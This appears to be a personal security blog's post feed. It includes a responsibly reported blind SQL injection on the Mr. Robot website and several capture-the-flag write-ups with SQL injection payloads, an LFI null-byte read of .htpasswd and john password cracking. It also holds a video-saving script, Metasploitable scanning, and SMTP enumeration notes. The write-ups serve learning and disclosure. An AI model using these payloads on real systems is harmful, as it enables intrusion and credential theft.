Mr.Robot Blind SQL Injection Vulnerability

So the other day I saw this article http://thehackernews.com/2016/05/hacker-mr-robot-season2.html on TheHackerNews and in Forbes how a hacker found a XSS vulnerability on Mr Robot Tv series official website. since I’m a big fan of the TV Series I went and look around bit .  I wasn’t expecting to find any vulnerabilities but I had my burp running on side. so there was this section where we can subscribe our email and “join and be a part of the revolution” and so I did and I saw the request is going a page called “Usa_api.php”  .  I had put a single quote and see. Response didn’t come with any errors it just responded “Invalid E-mail Address” . Then I did “email=cc@cc.com’+and+’x’=’x” and it returned with “Access Denied“.  which got me thinking maybe its vulnerable for blind SQLi

so I did some tests

true returns forbidden

Screen Shot 2016-05-12 at 2.43.20 PM

false returned with Invalid E-mail Address

Screen Shot 2016-05-12 at 2.43.27 PM

 

 

Since it was written PHP my best guest was it might have a MySQL backend AND Its behind a WAF but after few attempts I felt like its time for SQLMap

since it returns 403 on true . I passed –code=403 for make it easy for SQLMap

Screen Shot 2016-05-13 at 12.51.09 PM

and the DB it came up with was

Screen Shot 2016-05-13 at 3.50.17 PM

I reported the vulnerability (2016-05-12) to “domain.admin@nbcuni.com” .

and they responded and patched it (2016-05-14)

Screen Shot 2016-05-14 at 8.47.13 AM

 

damo.clanteam.com Security Challenge VI [Writeup]

alright this one is a tricky one . got some time for me to figure it out . so on first I spend about 1/2 hr trying to figure out what is happening . but when I saw a register page I got a feeling it has something to do with cookie  injection . so I started up Burp Suite and I logged in . all I had was a “PHPSESSID”  . I spend some time googling to see if there is anything up PHPSESSID . so almost everything was a dead end . but then when I was going trough Burp Suite history . I saw there were 2 deleted cookies when I was logging

1

those seemed like something to be concerned . after spending some time messing around . when I was logging in again . I ticked on  “Remember me” . so then I saw those two cookie parameters were saved in the session .

2

Now both parameters seems to be encrypted with base64 .so I used ruby to decode the base64

root@bt:~# echo “require ‘base64’; puts Base64.decode64(‘bnVrZTk5’)” | ruby
nuke99

so its the obvious answer my ‘nuke99′ (username) so I encoded username “admin’ or ‘x’=’x”  and replace the parameter “usernamesch6” value .

root@bt:~# echo “require ‘base64’; puts Base64.encode64(‘admin\’ or \’x\’=\’x’)” | ruby
YWRtaW4nIG9yICd4Jz0neA==

 

3

and now I’m logged in as the Admin. alright now goto the “members-only.php” and Submit your name with the replaced Admin session

5

 

Ok now cya until the next challenge

damo.clanteam.com Security Challenge III [Writeup]

alright , this one is easy .  the challenge is on basic SQL Injection . In the challenge application there is a SQL injection vulnerability in member-info.php page . its a basic UNION based SQL injection , from there I used sqlmap to spice things up

vulnerable application URL is

http://damo.clanteam.com/sch3/member-info.php?id=1'+union+select+1,'nuke99',3,4,5+from+accounts--

 

2

so the password were encrypted with SHA1 encryption . for that I used a online hash database to get plain text password

3

and using “stanllone” as the user name and fire as the password I logged into the members area

that’s about it . see you soon guys

damo.clanteam.com Security Challenge II [Writeup]

I just completed the second challenge of damo.clanteam.com . it was really challenge to figure out what was the vulnerability . anyhow I’m not going to write how I did it because I  googled couldn’t find a single person who wrote a write up for it . but anyway I’m going to give a away a free tip

Key file is in

http://damo.clanteam.com/sch2/admin_key.txt

Rest of the challenge is up to you😀

Have funn

damo.clanteam.com Security Challenge I [writeup]

hey fellas been a while since last post . anyway I saw this security challenge post on twitter thought of giving a shot . so this is the write-up post for the first challenge . its pretty easy actually .

the challenge is to login to admin area which is protected with .htpasswd .When we entered in to challenge there is a link to see people who completed the challenge . the first thing I noticed is the page URL which had index.php?page=halloffame . So my guess was either LFI or  SQLi . with a simple single quote I was able to identify the vulnerability is LFI because the error contented  

Warning: include(halloffame'.php)

also sine .php is added my index.php I guessed the code is something like

<?php
include($_GET['page'].".php");
?>

since there is a .php included in the end therefor I used null to comment it out . also since our target to get htpasswd file, I tried the first attempt with page=admin/.htpasswd% but it returned with no file . so my second guess was page=admin/.htaccess%00

c1-01

and it returned with

AuthType Basic AuthName "Restricted Access!" AuthUserFile /www/clanteam.com/d/a/m/damo/htdocs/hiddenfoldersch1/.htpasswd Require user damo

so now we know the path for .htpasswd file . so my next obvious step is to grab the .htpasswd file

C1-S2

since the password was encrypt I used john to crack the password

john --wordlist=/usr/share/wordlist/rockyou.txt htpasswd

and after the brute is sucessfull I got the password as

c1-s3

alright . see you soon guys

Finished watching a movie online ? save the movie in your machine without downloading

alright. I’ve been watching TV series for the paste couple of days non-stop . one of the things keep bothering me is to save the file after finish watching it online . So I thought I’ll just write a script to do it for me . (I know this can be done in couple of lines . but I added some function which made the code bigger than I thought )

so the script can be found at HERE (Only tested in Ubuntu 12.10 – Chromium. Feel free to change the code for your requirements )

its easy but you need to have ruby installed and the gem “readline”

install Ruby on Ubuntu

sudo apt-get install ruby

install Readline Gem

sudo gem install readline

Ok now we have ruby and readline gem installed now lets go trough the installation process

cd /tmp
wget https://bitbucket.org/nuke_99/my-tools/raw/bd4dc807d8cfa4dac17425f84d8e69c8f447ee7b/flash_save.rb -O  flash_save
chmod -x flash_save
sudo mv flash_save /usr/local/bin/flash_save
cd ~/
flash_save

Ok to run flash_save just type “flash_save” and it will get your home folder and save the file in there
or you can give a instruction.

flash_player /home/nuke/Video/big_bang_theory_S1_E01.flv
[+] saved in /home/nuke/Video/big_bang_theory_S1_E01.flv

and if you have multiple videos in your browser it will give you a prompt to select what video to save . use the “help” command to get the instructions . using “list” command you will be able to get the no list of the loaded files and “play ” will play the selected video so can check before downloading and finally “save ” will save the video to the path given

nuke@ihackmybox:~/$ flash_save /home/nuke/Videos/big_bang_theory_S3-E11.flv
[!] You have more than one flash player loaded in your browser
> help
help          : gets the list of the commands
list          : list the number of the vid file
play  : will play the selected file with the given player
save          : will save the file
quit          : exit the prompt
> list
24
32
> play 24
VLC media player 2.0.1 Twoflower (revision 2.0.1-0-gf432547)
[0x1f19108] main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.
> save 24
[+] saved in /home/nuke/Videos/big_bang_theory_S3-E11.flv
>
> quit

Using VLC as the media player

@@default_player = 'vlc' <= Change that to "vlc"
@@mem_id = 12624
@@files = []
@@path = Dir.home # You can change the path to anyplace you want
@@file_name = "#{rand(6)}.flv"
@@list_item = []

Alright mates have fun

Metasploitable 2 FTP Exploitation (vsftpd backdoor) SESSION 1

Metasploitable 2 has been released for a while I didn’t had a chance to use it . so I tried it today and I thought of writing  what I’m trying on metaploitable on the blog .

so I started with a simple PING nmap scan on the internal network to see what are the hosts which is running at the moment


Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-04 08:47 EST
Nmap scan report for 192.168.1.1
Host is up (0.00093s latency).
MAC Address: D8:6H:4C:EA:BB:B1 (Tp-link Technologies Co.)
Nmap scan report for 192.168.1.100
Host is up.
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
MAC Address: 00:64:BE:8M:YD:12 (Sony)
Nmap scan report for 192.168.1.102
Host is up (0.0010s latency).
MAC Address: 08:00:27:A2:76:F2 (Cadmus Computer Systems)
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.48 seconds

Continue reading

Local File and Folder Transferring to Remote Servers trough SSH (Hack Tip)

I have this use of clearing my pentest data after finishing a job . what I used to do is to upload all my pentest information in to a remote server trough FTP and clear the data in the local machine . but for the paste couple of months I started to use SSH for the file transfer , which is much easier than FTP.

to transfer a file to a remote server trough SSH 

scp dump.sql nuke@67.22.xx.xx:pentest

dump.sql -> the local machine transfer file

nuke@67.22.xx.xx -> auth user and remote server

pentest -> remote folder to upload

Uploading a entire folder to ssh is almost the same just need to use the -r

to transfer a file to a remote server trough SSH 

scp -r pentestdata nuke@67.22.xx.xx:pentest

pentestdata-> the local machine folder

nuke@67.22.xx.xx -> auth user and remote server

pentest -> remote folder to upload

guess this could be a useful tip for you too🙂

Penetration Testing Lab

SMTP is a service that can be found in most infrastructure penetration tests.This service can help the penetration tester to perform username enumeration via the EXPN and VRFY commands if these commands have not been disabled by the system administrator.There are a number of ways which this enumeration through the SMTP can be achieved and there will be explained in this article.

The role of the EXPN command is to reveal the actual address of users aliases and lists of email and VRFY which can confirm the existance of names of valid users.

The SMTP enumeration can be performed manually through utilities like telnet and netcat or automatically via a variety of tools like metasploit,nmap and smtp-user-enum.The following 2 screenshots are showing how we can enumerate users with the VRFY and RCPT commands by using the telnet service.

 

Metasploit

The module that can perform user enumeration via SMTP in…

View original post 269 more words